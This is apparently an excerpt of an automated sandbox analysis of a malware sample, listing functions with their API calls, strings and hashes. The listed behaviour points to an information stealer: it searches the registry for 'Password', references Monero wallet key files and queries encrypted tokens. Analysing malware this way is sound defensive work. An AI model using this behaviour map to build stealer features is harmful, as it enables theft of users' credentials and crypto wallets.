Instruction Fuzzy Hash: F5311A71D00149DFDB08EBE8DC99EEE7778FB66301F144118F102EB691DA34A946DB62

Function 008B7500 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 008B7542
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 008B757F
GetProcessHeap.KERNEL32(00000000,00000104), ref: 008B7603
RtlAllocateHeap.NTDLL(00000000), ref: 008B760A
wsprintfA.USER32 ref: 008B7640

Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788

Strings

:, xrefs: 008B755C
\, xrefs: 008B7560
C, xrefs: 008B754C

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
String ID: :$C$\
API String ID: 1544550907-3809124531
Opcode ID: ecb2e817fe77180bcdf13652f22c6df44b58ee32fd8cdaafb3dc4e51906cdbe5
Instruction ID: 6db6e486095ea2a1ceb18dc8468d69eb0c9129546fa8ba9372673b472ee49154
Opcode Fuzzy Hash: ecb2e817fe77180bcdf13652f22c6df44b58ee32fd8cdaafb3dc4e51906cdbe5
Instruction Fuzzy Hash: 844181B1904348ABDB10DF98DC95BDEBBB8FB58704F140199F509AB280DB746A44CBA6

Function 008A60A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 008BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008BA7E6

Part of subcall function 008A47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 008A4839
Part of subcall function 008A47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 008A4849

InternetOpenA.WININET(008C0DF7,00000001,00000000,00000000,00000000), ref: 008A610F
StrCmpCA.SHLWAPI(?,0127EA70), ref: 008A6147
InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 008A618F
CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 008A61B3
InternetReadFile.WININET(?,?,00000400,?), ref: 008A61DC
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 008A620A
CloseHandle.KERNEL32(?,?,00000400), ref: 008A6249
InternetCloseHandle.WININET(?), ref: 008A6253
InternetCloseHandle.WININET(00000000), ref: 008A6260

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
String ID:
API String ID: 2507841554-0
Opcode ID: 06ada23bcc6a50e772acef46c2f8269286c82aadb9fffcdc82db7b74ed1063e9
Instruction ID: b4952e40646099146010dfa590e7c6ddd598e18ba96521d16650f755deca1db1
Opcode Fuzzy Hash: 06ada23bcc6a50e772acef46c2f8269286c82aadb9fffcdc82db7b74ed1063e9
Instruction Fuzzy Hash: 605165B1900218ABEF24DFA4DC85BEE7778FB44705F108098B605E71C5EB746A85CF56

Function 008A72D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 008A733A
RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 008A73B1
StrStrA.SHLWAPI(00000000,Password,00000000), ref: 008A740D
GetProcessHeap.KERNEL32(00000000,?), ref: 008A7452
HeapFree.KERNEL32(00000000), ref: 008A7459
task.LIBCPMTD ref: 008A7555

Strings

Password, xrefs: 008A7401

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: Heap$EnumFreeOpenProcessValuetask
String ID: Password
API String ID: 775622407-3434357891
Opcode ID: 91b6ac3a435d1193e4629993affeea9617ae97c3033c550f512c4a5ac8f492fd
Instruction ID: 05dd69e0d1458c61413453358154c1826963960248fe9f789955a2c7eac81213
Opcode Fuzzy Hash: 91b6ac3a435d1193e4629993affeea9617ae97c3033c550f512c4a5ac8f492fd
Instruction Fuzzy Hash: C0612BB5D0416C9BEB24DB54CC85BD9B7B8FF49300F0081E9E689A6541EB706BC9CFA1

Function 008ABA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON

Download Yara Rule

APIs

Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788

Part of subcall function 008BA9B0: lstrlen.KERNEL32(?,01278E88,?,\Monero\wallet.keys,008C0E17), ref: 008BA9C5
Part of subcall function 008BA9B0: lstrcpy.KERNEL32(00000000), ref: 008BAA04
Part of subcall function 008BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008BAA12

Part of subcall function 008BA920: lstrcpy.KERNEL32(00000000,?), ref: 008BA972
Part of subcall function 008BA920: lstrcat.KERNEL32(00000000), ref: 008BA982

Part of subcall function 008BA8A0: lstrcpy.KERNEL32(?,008C0E17), ref: 008BA905

Part of subcall function 008BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008BA7E6

lstrlen.KERNEL32(00000000), ref: 008ABC9F

Part of subcall function 008B8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 008B8E52

StrStrA.SHLWAPI(00000000,AccountId), ref: 008ABCCD
lstrlen.KERNEL32(00000000), ref: 008ABDA5
lstrlen.KERNEL32(00000000), ref: 008ABDB9

Strings

AccountTokens, xrefs: 008ABABA
AccountId, xrefs: 008ABCC4
AccountTokens, xrefs: 008ABB49
SELECT service, encrypted_token FROM token_service, xrefs: 008ABBEB

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
API String ID: 3073930149-1079375795
Opcode ID: 8f2fdb93c6af4953be1bf13ee03621d3c7b5b81ae337ed771caaca2ea883b1f8
Instruction ID: 287823a35e116593494cc5ef109b88cbcb4249541353edacfb974a991a976a8f
Opcode Fuzzy Hash: 8f2fdb93c6af4953be1bf13ee03621d3c7b5b81ae337ed771caaca2ea883b1f8
Instruction Fuzzy Hash: 03B11F71910108ABDF18EBA4DD96EEE7738FF54300F404168F506E66A2EF346A49CB63

Function 008A4FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 008A4FCA
RtlAllocateHeap.NTDLL(00000000), ref: 008A4FD1
InternetOpenA.WININET(008C0DDF,00000000,00000000,00000000,00000000), ref: 008A4FEA
InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 008A5011
InternetReadFile.WININET(?,?,00000400,00000000), ref: 008A5041
InternetCloseHandle.WININET(?), ref: 008A50B9
InternetCloseHandle.WININET(?), ref: 008A50C6

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
String ID:
API String ID: 3066467675-0
Opcode ID: 92664ac6f023b7a895d938305ad12e857d74856974250a4ce5a68ced2ae13514
Instruction ID: 0ee5b133417f677bf79d25c93ed2fa5b0c0025c6f752fa79e6ac9ba833b848c3
Opcode Fuzzy Hash: 92664ac6f023b7a895d938305ad12e857d74856974250a4ce5a68ced2ae13514
Instruction Fuzzy Hash: 6B31C4B4A4021CABDB24CF94DC85BDDB7B4FB48704F5081D9EB09A7281D7706AC68F99

Function 008B8100 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 67memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0127E098,00000000,?,008C0E2C,00000000,?,00000000), ref: 008B8130
RtlAllocateHeap.NTDLL(00000000), ref: 008B8137
GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 008B8158
wsprintfA.USER32 ref: 008B81AC

Strings

@, xrefs: 008B814D
%d MB, xrefs: 008B81A3

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
String ID: %d MB$@
API String ID: 2922868504-3474575989
Opcode ID: b3d1bb72fc3c309ec1d9a72eb8405ca4ce809a8d40645bab26918b45a6a48fa4
Instruction ID: 13b7babff64258fd39b56a4c3262680befa601a5bf0342b551d5c6e48d6c7094
Opcode Fuzzy Hash: b3d1bb72fc3c309ec1d9a72eb8405ca4ce809a8d40645bab26918b45a6a48fa4
Instruction Fuzzy Hash: F521EAB1E44358ABDB10DFD8CC49FAEBBB8FB44B14F104619F615BB280D77869018BA5

Function 008B83DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON

Download Yara Rule

APIs

RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 008B8426
wsprintfA.USER32 ref: 008B8459
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 008B847B
RegCloseKey.ADVAPI32(00000000), ref: 008B848C
RegCloseKey.ADVAPI32(00000000), ref: 008B8499

Part of subcall function 008BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008BA7E6

RegQueryValueExA.KERNEL32(00000000,0127DF90,00000000,000F003F,?,00000400), ref: 008B84EC
lstrlen.KERNEL32(?), ref: 008B8501
RegQueryValueExA.KERNEL32(00000000,0127DFC0,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,008C0B34), ref: 008B8599
RegCloseKey.KERNEL32(00000000), ref: 008B8608
RegCloseKey.ADVAPI32(00000000), ref: 008B861A

Strings

%s\%s, xrefs: 008B844D

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
String ID: %s\%s
API String ID: 3896182533-4073750446
Opcode ID: 7b1e29486427b69a4ff2e20a4209a56c9afd37853c2542f01da32e92a9ad906b
